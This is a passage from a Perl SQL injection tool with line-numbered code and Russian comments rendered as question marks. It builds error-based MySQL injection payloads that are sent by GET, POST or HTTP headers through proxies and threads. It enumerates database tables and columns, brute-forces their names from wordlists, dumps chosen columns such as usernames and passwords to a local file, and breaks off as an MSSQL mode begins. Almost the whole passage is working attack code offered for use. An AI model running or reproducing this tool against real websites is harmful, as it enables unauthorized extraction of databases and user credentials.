4891.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4892.               $sql_header_query =~ s!\Q$search!$replacement!g;
4893.               $content = scan_url_HEADER();
4894.       }                      
4895.     $colum_number = $content;
4896.     $colum_number =~ m/ussr(.*?)ussr/img;
4897.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
4898.             $current="";
4899.             $content="";
4900.             $sql_post="";
4901.             $sql_header_query="";
4902.     $full_table_name = $prefix . "." . $choice;
4903.     print "Number of columns in " . $full_table_name . ": $colum_number\n";
4904.     print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
4905.     print "----------\n";
4906.     ## ?????? ??????? ##
4907.     $thr = $kol_threads; # ???-?? ???????
4908.     $num = -1; # ?? ????????
4909.     print "Request method - $method\n";
4910.     print "Threads - $kol_threads\n";
4911.     print "Proxy - $proxy_message\n";
4912.     print "----------------------\n";
4913.     print FILE  "Columns in " . $full_table_name . "\n";
4914.     for(0..$thr) {
4915.          $trl[$_] = threads->create(\&gets113111);
4916.     }
4917.     for(0..$thr) {
4918.          $trl[$_]->join;
4919.     }
4920.     sub gets113111 {
4921.        $| = 1;
4922.        while ($num<$colum_number) {
4923.          { lock($num);
4924.          $num++; }
4925.       if($sql_flag == 0){
4926.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4927.               $content = scan_url();
4928.       } elsif ($sql_flag == 1) {#POST
4929.               $current = $f_url;
4930.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4931.               $content = scan_url_POST();
4932.       } elsif($sql_flag == 2){#HEADER
4933.               $current = $f_url;
4934.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4935.               $sql_header_query =~ s!\Q$search!$replacement!g;
4936.               $content = scan_url_HEADER();
4937.       }                      
4938.          if ($content =~ m/ussr(.*?)ussr/img) {
4939.                   print "   " . $1 . "\n";
4940.                   print FILE "  "  . $1 . "\n";
4941.          }
4942.          print $num . "\r";
4943.          sleep $pause;
4944.             $current="";
4945.             $content="";
4946.             $sql_post="";
4947.             $sql_header_query="";
4948.  
4949.        }
4950.     }
4951.     print FILE "----------\n";
4952.     print "----------\n";
4953.     print "Saved in " . "z_" . $host . ".txt\n";
4954.     close(FILE);
4955.     goto START2001;
4956. }# end 3
4957. if ($choice==7) {
4958.     sub ascii_to_hex ($) {
4959.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
4960.                $str = "0x" . $str;
4961.              return $str;
4962.     }
4963.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
4964.     if ($full_table_name) {
4965.        print "-----------------------------------------\n";
4966.        print "Use last parsed table: $full_table_name ? (1/0): ";
4967.        $choice = <STDIN>;
4968.        chomp $choice;
4969.        if ($choice==1) {
4970.              $table_name = $full_table_name;
4971.              print "Table: $table_name\n";
4972.              print "----------\n";
4973.        } else {
4974.              print "-----------------------------------------\n";
4975.              print "Enter the table_name: ";
4976.              $choice = <STDIN>;
4977.              chomp $choice;
4978.              if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
4979.              $table_name = $choice;
4980.              print "-----------------------------------------\n";
4981.              print "MySQL>=5 or MySql<5? (1/0): ";
4982.              $choice = <STDIN>;
4983.              chomp $choice;
4984.              if ($choice == 1) {
4985.                   $choice1 = ascii_to_hex $table_name;
4986.       if($sql_flag == 0){
4987.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4988.               $content = scan_url();
4989.       } elsif ($sql_flag == 1) {#POST
4990.               $current = $f_url;
4991.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4992.               $content = scan_url_POST();
4993.       } elsif($sql_flag == 2){#HEADER
4994.               $current = $f_url;
4995.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4996.               $sql_header_query =~ s!\Q$search!$replacement!g;
4997.               $content = scan_url_HEADER();
4998.       }                                  
4999.                   $prefix = $content;
5000.                   $prefix =~ m/ussr(.*?)ussr/img;
5001.                   $prefix = $1; # ??, ? ??????? ???????
5002.             $current="";
5003.             $content="";
5004.             $sql_post="";
5005.             $sql_header_query="";
5006.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
5007.                   $table_name = $prefix . "." . $table_name;
5008.              }
5009.              print "Table: $table_name\n";
5010.              print "----------\n";
5011.        }
5012.     } else {
5013.        print "-----------------------------------------\n";
5014.        print "Enter the table_name: ";
5015.        $choice = <STDIN>;
5016.        chomp $choice;
5017.        if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
5018.        $table_name = $choice;
5019.        print "-----------------------------------------\n";
5020.        print "MySQL>=5 or MySql<5? (1/0): ";
5021.        $choice = <STDIN>;
5022.        chomp $choice;
5023.        if ($choice == 1) {
5024.                   $choice1 = ascii_to_hex $table_name;
5025.        if($sql_flag == 0){
5026.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5027.               $content = scan_url();
5028.       } elsif ($sql_flag == 1) {#POST
5029.               $current = $f_url;
5030.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5031.               $content = scan_url_POST();
5032.       } elsif($sql_flag == 2){#HEADER
5033.               $current = $f_url;
5034.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5035.               $sql_header_query =~ s!\Q$search!$replacement!g;
5036.               $content = scan_url_HEADER();
5037.       }                  
5038.                   $prefix = $content;
5039.                   $prefix =~ m/ussr(.*?)ussr/img;
5040.                   $prefix = $1; # ??, ? ??????? ???????
5041.             $current="";
5042.             $content="";
5043.             $sql_post="";
5044.             $sql_header_query="";
5045.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
5046.                   $table_name = $prefix . "." . $table_name;
5047.        }
5048.        print "Table: $table_name\n";
5049.        print "----------\n";
5050.     }
5051.     print "-----------------------------------------\n";
5052.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
5053.     $choice = <STDIN>;
5054.     chomp $choice;
5055.     $column_name = $choice;
5056.     print FILE  "-----------------------------------------\n";
5057.     print FILE  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
5058.     print FILE  "-----------------------------------------\n";
5059.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
5060.     print "-----------------------------------------\n";
5061.     print "Do you want add condition to sql-query?\n";
5062.     print "----------\n";
5063.     print "for example - where id=1 ? (1/0): ";
5064.     $choice = <STDIN>;
5065.     chomp $choice;
5066.     if ($choice==1) {
5067.         print "-----------------------------------------\n";
5068.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
5069.         print "----------\n";
5070.         $choice = <STDIN>;
5071.         chomp $choice;
5072.         $where = $choice;
5073.         # ?????????:
5074.         ($con,$whe) = split(/=/,$where);
5075.         if($whe =~ m/[^0-9]/img) {$where = $con . "=" . ascii_to_hex $whe}
5076.         print "Your condition: [ where $where ]\n";
5077.         $condition=1;
5078.     } else {
5079.         $condition=0;
5080.     }
5081.     if ($condition==0) {
5082.          print "----------\n";
5083.          ## ?????? ???-?? ???????? ?? ??????? #
5084.          print "Count data from [ $table_name  ]\n";
5085.       if($sql_flag == 0){
5086.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5087.               $content = scan_url();
5088.       } elsif ($sql_flag == 1) {#POST
5089.               $current = $f_url;
5090.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5091.               $content = scan_url_POST();
5092.       } elsif($sql_flag == 2){#HEADER
5093.               $current = $f_url;
5094.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5095.               $sql_header_query =~ s!\Q$search!$replacement!g;
5096.               $content = scan_url_HEADER();
5097.       }                          
5098.          $column_name_p = $content;
5099.          $column_name_p =~ m/ussr(.*?)ussr/img;
5100.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
5101.             $current="";
5102.             $content="";
5103.             $sql_post="";
5104.             $sql_header_query="";
5105.          print "$column_name_p\n";
5106.          print "----------\n";
5107.          ## start from2 ##
5108.          print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
5109.          $choice = <STDIN>;
5110.          chomp $choice;
5111.          $thr = $kol_threads; # ???-?? ???????
5112.          if ($choice == 1) {
5113.               $num = -1; # ?? ????????
5114.          } else {
5115.               print "Enter START_position: ";
5116.               $choice1 = <STDIN>;
5117.               chomp $choice1;
5118.               $num = $choice1-2;
5119.               print "Enter END_position: ";
5120.               $choice2 = <STDIN>;
5121.               chomp $choice2;
5122.               $column_name_p = $choice2-1;
5123.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
5124.          }
5125.          print "-----------------------------------------\n";
5126.          print "Request method - $method\n";
5127.          print "Threads - $kol_threads\n";
5128.          print "Proxy - $proxy_message\n";
5129.          print "----------------------\n";
5130.          ## end from2
5131.          ## ?????? ?????? ?? ??????? ##
5132.          for(0..$thr) {
5133.              $trl[$_] = threads->create(\&gets114111);
5134.          }
5135.          for(0..$thr) {
5136.              $trl[$_]->join;
5137.          }
5138.          sub gets114111 {
5139.             $| = 1;
5140.             while ($num<$column_name_p) {
5141.                { lock($num);
5142.                $num++; }
5143.       if($sql_flag == 0){
5144.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
5145.               $content = scan_url();
5146.       } elsif ($sql_flag == 1) {#POST
5147.               $current = $f_url;
5148.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
5149.               $content = scan_url_POST();
5150.       } elsif($sql_flag == 2){#HEADER
5151.               $current = $f_url;
5152.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
5153.               $sql_header_query =~ s!\Q$search!$replacement!g;
5154.               $content = scan_url_HEADER();
5155.       }                  
5156.                if ($content =~ m/ussr(.*?)ussr/imgs) {
5157.                     print "   " . $1 . "\n";
5158.                     print FILE "  "  . $1 . "\n";
5159.                }
5160.                print $num . "\r";
5161.                sleep $pause;
5162.             $current="";
5163.             $content="";
5164.             $sql_post="";
5165.             $sql_header_query="";
5166.  
5167.             }
5168.          }
5169.     print "----------\n";
5170.     print "Saved in " . "z_" . $host . ".txt\n";
5171.     close(FILE);
5172.     goto START2001;
5173.     } else {
5174.     ## ?????? ?????? ?? ??????? ##
5175.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
5176.       if($sql_flag == 0){
5177.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5178.               $content = scan_url();
5179.       } elsif ($sql_flag == 1) {#POST
5180.               $current = $f_url;
5181.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5182.               $content = scan_url_POST();
5183.       } elsif($sql_flag == 2){#HEADER
5184.               $current = $f_url;
5185.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5186.               $sql_header_query =~ s!\Q$search!$replacement!g;
5187.               $content = scan_url_HEADER();
5188.       }                  
5189.          $column_name_p = $content;
5190.          $column_name_p =~ m/ussr(.*?)ussr/img;
5191.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
5192.             $current="";
5193.             $content="";
5194.             $sql_post="";
5195.             $sql_header_query="";
5196.          print "$column_name_p\n";
5197.          print "----------\n";
5198.          ## start from2 ##
5199.          print "Get ALL data from " . $table_name . " with [ where " . $where . " ] (" . $column_name_p . ") ? (1/0): ";
5200.          $choice = <STDIN>;
5201.          chomp $choice;
5202.          $thr = $kol_threads; # ???-?? ???????
5203.          if ($choice == 1) {
5204.               $num = -1; # ?? ????????
5205.          } else {
5206.               print "Enter START_position: ";
5207.               $choice1 = <STDIN>;
5208.               chomp $choice1;
5209.               $num = $choice1-2;
5210.               print "Enter END_position: ";
5211.               $choice2 = <STDIN>;
5212.               chomp $choice2;
5213.               $column_name_p = $choice2-1;
5214.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
5215.          }
5216.          print "-----------------------------------------\n";
5217.          print "Request method - $method\n";
5218.          print "Threads - $kol_threads\n";
5219.          print "Proxy - $proxy_message\n";
5220.          print "----------------------\n";
5221.          ## end from2
5222.          for(0..$thr) {
5223.              $trl[$_] = threads->create(\&gets115111);
5224.          }
5225.          for(0..$thr) {
5226.              $trl[$_]->join;
5227.          }
5228.          sub gets115111 {
5229.             $| = 1;
5230.             while ($num<$column_name_p) {
5231.                { lock($num);
5232.                $num++; }
5233.       if($sql_flag == 0){
5234.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
5235.               $content = scan_url();
5236.       } elsif ($sql_flag == 1) {#POST
5237.               $current = $f_url;
5238.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
5239.               $content = scan_url_POST();
5240.       } elsif($sql_flag == 2){#HEADER
5241.               $current = $f_url;
5242.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
5243.               $sql_header_query =~ s!\Q$search!$replacement!g;
5244.               $content = scan_url_HEADER();
5245.       }            
5246.                if ($content =~ m/ussr(.*?)ussr/img) {
5247.                     print "   " . $1 . "\n";
5248.                     print FILE "  "  . $1 . "\n";
5249.                }
5250.                print $num . "\r";
5251.                sleep $pause;
5252.             $current="";
5253.             $content="";
5254.             $sql_post="";
5255.             $sql_header_query="";
5256.  
5257.             }
5258.          }
5259.          print "----------\n";
5260.          print "Saved in " . "z_" . $host . ".txt\n";
5261.          close(FILE);
5262.          goto START2001;
5263.     }
5264. }# end 4
5265. # floor brute tables & columns mysql4
5266. if ($choice == 8) {
5267.    START2002:
5268.    print "    [1] Brute table\n";
5269.    print "    [2] Brute column\n";
5270.    print "    [3] Main menu\n";
5271.    print "----------\n";
5272.    $choice = <STDIN>;
5273.    chomp $choice;
5274.    print "Your choice: $choice\n";
5275.    $current = $f_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5276.    print "Check version(): ";
5277.    $content = scan_url();
5278.    $ver = $content;
5279.    $ver =~ m/ussr(.*?)ussr/img;
5280.    $ver = $1;
5281.    if ($ver) {
5282.          print " $ver \n";
5283.    } else {
5284.          print " Can't get data \n";
5285.          goto START2002;
5286.    }
5287.    print "-------------\n";
5288.    if ($choice == 1) {
5289.        open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
5290.        print "   Brute tables\n";
5291.        print "   -------------\n";
5292.        print FILE1 "   Brute tables\n";
5293.        print FILE1 "   -------------\n";
5294.        open(FILE, "<", $source_table_list);
5295.        while(<FILE>) {
5296.          chomp;
5297.          push(@tables4, $_);
5298.        }
5299.        close(FILE);
5300.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
5301.        $choice = <STDIN>;
5302.        chomp $choice;
5303.        if ($choice == 1) {
5304.               print "Enter your prefix for brute tables: ";
5305.               $choice = <STDIN>;
5306.               chomp $choice;
5307.               $pref_brute = $choice;
5308.        } else {
5309.               $pref_brute = "";
5310.        }
5311.        $size = 0;
5312.        $size = @tables4;
5313.        print "File: $source_table_list\n";
5314.        print "Tables: $size\n";
5315.        print "-------------\n";
5316.        print "Request method - $method\n";
5317.        print "Threads - $kol_threads\n";
5318.        print "Proxy - $proxy_message\n";
5319.        print "----------------------\n";
5320.        $thr = $kol_threads; # ???-?? ???????
5321.        $num = -1; # ?? ????????
5322.        for(0..$thr) {
5323.             $trl[$_] = threads->create(\&gets6123);
5324.        }
5325.        for(0..$thr) {
5326.             $trl[$_]->join;
5327.        }
5328.        sub gets6123 {
5329.             $| = 1;
5330.             while ($num<$size) {
5331.                { lock($num);
5332.                $num++; }
5333.                $current1 = $pref_brute . $tables4[$num];
5334.                $current = $f_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $num . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $current1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $current1 . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5335.                $content = scan_url();
5336.                if ($content =~ m/ussr(.*?)ussr/img) {
5337.                     print "   ---> " . $current1 . "\n";
5338.                     print FILE1 "  "  . $current1 . "\n";
5339.                }
5340.                print $num . "\r";
5341.                sleep $pause;
5342.  
5343.             }
5344.        }
5345.        print "----------\n";
5346.        print "Saved in " . "z_" . $host . ".txt\n";
5347.        close(FILE1);
5348.        goto START2002;
5349.    }
5350.    if ($choice == 2) {
5351.          open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
5352.          print "   Brute columns\n";
5353.          print "   -------------\n";
5354.          print FILE1 "   Brute columns\n";
5355.          print FILE1 "   -------------\n";
5356.          print "Enter the table_name for brute: \n";
5357.          $choice = <STDIN>;
5358.          chomp $choice;
5359.          $table = $choice;
5360.          print "Brute columns for table [ " . $table . " ]\n";
5361.          print "-------------\n";
5362.          print "   Check table exist: ";
5363.          $current = $f_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2 . $f_plus . "from" . $f_plus . $table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5364.          $content = scan_url();
5365.          $ver =$content;
5366.          $ver =~ m/ussr(.*?)ussr/img;
5367.          $ver = $1;
5368.          if ($ver) {
5369.              print " Ok \n";
5370.          } else {
5371.              print " No such table... \n";
5372.              goto START2002;
5373.          }
5374.          open(FILE, "<", $source_column_list);
5375.          while(<FILE>) {
5376.             chomp;
5377.             push(@columns4, $_);
5378.          }
5379.          close(FILE);
5380.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
5381.        $choice = <STDIN>;
5382.        chomp $choice;
5383.        if ($choice == 1) {
5384.               print "Enter your prefix for brute columns: ";
5385.               $choice = <STDIN>;
5386.               chomp $choice;
5387.               $pref_brute = $choice;
5388.        } else {
5389.               $pref_brute = "";
5390.        }
5391.          $size = 0;
5392.          $size = @columns4;
5393.          print "-------------\n";
5394.          print "File: $source_column_list\n";
5395.          print "Columns: $size\n";
5396.          print "-------------\n";
5397.          print "Request method - $method\n";
5398.          print "Threads - $kol_threads\n";
5399.          print "Proxy - $proxy_message\n";
5400.          print "----------------------\n";
5401.          $thr = $kol_threads; # ???-?? ???????
5402.        $num = -1; # ?? ????????
5403.        for(0..$thr) {
5404.             $trl[$_] = threads->create(\&gets7123);
5405.        }
5406.        for(0..$thr) {
5407.             $trl[$_]->join;
5408.        }
5409.        sub gets7123 {
5410.             $| = 1;
5411.             while ($num<$size) {
5412.                { lock($num);
5413.                $num++; }
5414.                $current1 = $pref_brute . $columns4[$num];
5415.                $current = $f_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $current1 . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
5416.                $content = scan_url();
5417.                if ($content =~ m/ussr(.*?)ussr/img) {
5418.                     print "   ---> " . $current1 . "\n";
5419.                     print FILE1 "  "  . $current1 . "\n";
5420.                }
5421.                print $num . "\r";
5422.                sleep $pause;
5423.  
5424.             }
5425.        }
5426.        print "----------\n";
5427.        print "Saved in " . "z_" . $host . ".txt\n";
5428.        close(FILE1);
5429.        goto START2002;
5430.    }
5431.    if ($choice == 3) {
5432.        goto START_global;
5433.    }
5434. }
5435. if ($choice == 9) {goto START}
5436. } #end floor(rand)
5437. #########################################################
5438. if ($choice == 14) {goto START_global}
5439. }
5440. ## end MYSQL ##########################################################################################################
5441. ## MSSQL ##
5442. if ($choice == 2) {
5443. START_mssql:
5444. if ($ms_url =~ m/^https:\/\/?([^\/]+)/i) {
5445.    $host7 = $1;
5446.    $https_flag = 1;
5447.    print "----------------------\n";
5448.    print "HTTPS mode enabled\n";
5449.    print "----------------------\n";
5450. }
5451. $host = $host7;
5452. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
5453.     print "-----------------------------------------\n";
5454.     print "Authorization required, wait please....";
5455.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
5456.     $ck1 = collect($answ1);
5457.     $https_auth_check = 1;
5458.     print " DONE\n";
5459.     print "-----------------------------------------\n";
5460. }
5461. if ($use_socks == 1 && $socks_check == 0) {
5462.   $check_url = $host;
5463.   our $query = "GET / HTTP/1.$http_protocol\r\n"
5464.            . "Host: $check_host\r\n"
5465.            . "Referer: http://" . $check_url . "\r\n"
